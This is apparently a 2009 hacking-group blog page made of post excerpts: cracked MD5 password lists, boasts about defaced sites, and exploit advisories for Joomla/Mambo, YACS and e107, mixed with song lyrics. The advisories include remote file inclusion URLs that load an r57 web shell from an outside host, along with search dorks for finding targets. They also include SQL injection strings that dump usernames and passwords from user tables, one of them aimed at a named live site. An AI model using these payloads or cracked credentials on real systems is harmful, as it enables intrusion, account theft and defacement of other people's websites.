Friday, February 27, 2009

Hash Cracked

trapped eeb3fe2603459c1a2d36f274c9884de8traubel 6ce6d95a6f50c6e0c5b211f3a88cdcaetravaioli 161bfaed94828a469836e37c053c5b24travelling 5d55d8fa18da1ff5fd6b8aa699921ad8travolta 35e21c3db1acbf900e8c92fbfa761c41treacle 12873f83e7d37c554c9b1503b8625609treatment 6292fea48cc177b8bde77da7be2e3c51trees 2d5563ed288ac5396add9b78fbca810btresvant b9432c5dc3e35bcca1eece71c19235c7trevor d801a0b4701f64a0eae5f71f44f8d83ftribbles ca81601b0e6a2b249360ccfdd1cc71f8trinere 55aeb060862bcaadb34c10be51fe35c2tristar d65740220804de8da9843cb6cba68efatritt 58f61214090e9a055cd618cfb586b91dtrixter aa410c9111c7db8736d0c55f5847b3eetrois df809177146786d164f1fdd500fa1b1etrotsky cb4f3f03aab72fbdc6ead03fda325c15trovaioli 9fc04884864e2e9cc3dc38f38f9b2066truffaut 04eb51fd68c6eac1536fbd1a6160ea62trusting be7bfa28cbb984263b76c454d54305ebtuned...

Cracked Hash

81495c027241d3dc309428852164a68a tarahpol2ecee85a2d8dff0ab3a7f9d7e1e4bda4 300691443440b9290eabcddaa3b1a3c3efdeb4b zxeroyx06bb51580bad9dbdf7c51139b4324d10 2486959248259e3936ceb623ada5b48beb971d688c cerverin56289ed91281add402962da119fd5669 1968pp82373355a71e04ad91760915e2e24139 75764948580ef0836e519062e169d3259d344d30 42767712315953ba1215bbe6b562b879afd202f23 6010600e88336b8bca30c07d266b2e62d49dfa 266019800deedc996a94044b40f1be880d5cf506 629096250951d01b8a2c632024c10a7ae1730b7f9 1721963ee943db8f4ec8a64027718931f6829cc 142173519939cf85ab5e81be3a1e8cd2f91d945ad2 jrtobona4a34395c98c8a4594887fcff711d2de 0406029c7f8f83fd3141719b51128c7dc286c5 martin162856706c48641d5e774191a00662041c93 king4everdb36fdf51910d4cfa71a74f45f9211a1 elchefo3f2d2585a9729491cb88289e7715e458...

Thursday, February 26, 2009

Malingsial Site pwned

Domain: http://tukulesto.gtfsabah.com/Mirror: http://www.evilc0der.com/mirror/7050/uname -a: Linux netserv.netkl.orguid=99(nobody) gid=99(nobody) groups=99(nobody) VIVA INDONESIAN CODER TEAMFear Nothing. Risk Everythi...

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.usAuthor: Janek Vind "waraxe" Date: 29. May 2004 Location: EstoniaTartu Web: http://www.waraxe.us/index.php?modname=sa&id=31Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box. It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free. Homepage: http://e107.org/ Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ First of all, some conditions have to be met on victim server, to be vulnerable: 1. "register_globals" must be "on" 2. mysql must be version 4.x with enabled UNION functionality. Now, let's discuss those security flaws: A - Full...

Thursday, February 19, 2009

md5 hash result

HASH          RESULTf68d6257f3283c29a2ac0939ac45b46c tr1lat3ral b7d25e14395822461c97d9c9708d5cfb dc6W1hp 92794b20b92309b2e1ca335e4f95783e 6anina9638461e5b1f0ab939ddc0b5951f356e33 c8ommega7547db6e86d2a55fe0ab85985e367c33 ddsusannee865001d2e32ed9190a7bbf0c58b8678 2bUfciu244ea1588f1d141bfef687fbdb331b6e id01739d36d5aaa414cbb9ecbe561f959658b6 92279815dfff3348f289ea0e73f5ddd4a0f7a4 rex986912a4e59f670a12aa15ac3a8120efb1a3 us2rj6 3914591c9add5435d26f8d4750f5c108 itvbxycc19c8b8b6c36bac097274b15fa32efe oloxolox8332047cb4ceb1646c17f33a868a2912 1zorec330266e69e9d2cc380c6c98391055f4f1 28.3.19751bee9d8781669c55144e989f8640a4c9 16.7.1975b0acddac857b0971e0e414c50126c4c7 25.3.19654956c1b0cd069d16d3e53132bf89fc50 20.4.198943215c787d1360e929a8f4fa71f0262a...

Tuesday, February 17, 2009

Reel Big Fish - Where Have You Been?

You called me up last night in tears and said you missed me after all these yearsBut Ive been waiting here so long, Ive gotten over it since youve been goneYou called me up last night again and said youre finished with your new boyfriendAsked if you could come back home- so sorry that you left me all aloneYou say you love me, you love me again but if you love me- where have you been?You say you need me more than anyone else well go to hell, where have you been?You showed up at my door today and said my friend why do you push me awayLife with him was just so dull and what we had was something wonderfulYou say you love me, you love me again but if you love me- where have you been?You say you need me more than anyone else well go to hell- where have you been?I said you wish! I dont need this!...

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################## MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities######################################################### script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip######################################################### file : /ImageManager/Classes/ImageManager.php######################################################### Dork : index.php?option=com_swmenupro######################################################### Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell######################################################### require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");#########################################################...

Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI==================================================Found By : Cold z3ro , Cold-z3ro@hotmail.com==================================================Homepage: www.Hack-Teach.com==================================================Script Site : http://taskhopper.com/One1==================================================/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?==================================================#Long...

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+--found by breaker_unit and Don+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.Key Features: * Displaying the Qur'an in Arabic and its translations. * Enhanced with search...

Song for Gaza

Dear friends,I have been overwhelmed by the warmth and the friendship you have all given me in response to my song for Gaza, "We Will Not Go Down". I am doing my best to go through your numerous messages, emails and comments, and ask you to kindly bear with me until I am able to do so. Please forgive me if I am not able to respond to each and everyone of you; but please also know that I really appreciate your messages.My original intention to donate proceeds from the sale of the MP3 to charity has been complicated by technical matters; therefore, I have decided to make the song available free of charge. I would like to request that after downloading the song from this page, you kindly donate directly to a charity or an organization dedicated to alleviate the suffering of the Palestinian people....

Only tried old bugs

Domain Name : http://www.bergaul.com/Server banner : Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_bwlimited/1.4Operating system : UnixWeb server : Apache 2.xLIVEVIVA INDONESIAN CODER TEAMFear Nothing. Risk Everythi...

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------script: YACS version 8.11 ------------------------------------------------------------------download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip ==============================================vul: /yacs/scripts/update_trailer.php line 21 23 25;include_once $context['path_to_root'].'shared/safe.php'; 21if(!class_exists('i18n')) include_once $context['path_to_root'].'i18n/i18n.php'; 23if(!class_exists('SQL'))include_once $context['path_to_root'].'shared/sql.php'; 25==============================================dork: "Powered by yacs"----------------------------------------------xpl:http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]***************************************************---------------------------------------------------Author:...

Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection# Discovered by breaker_unit & Don# BHack# b4lc4n.org# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz lDorks:"Powered by eWriting 1.2.1allinurl:"com_ewriting"Joomla!/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--Mambo/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--+++++++++++++++++++++++++++++++++++++# milw0rm.com [2008-03-10]==============================================================EXAMPLE FROM ME :http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--VIVA...

Pages 3123 »
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons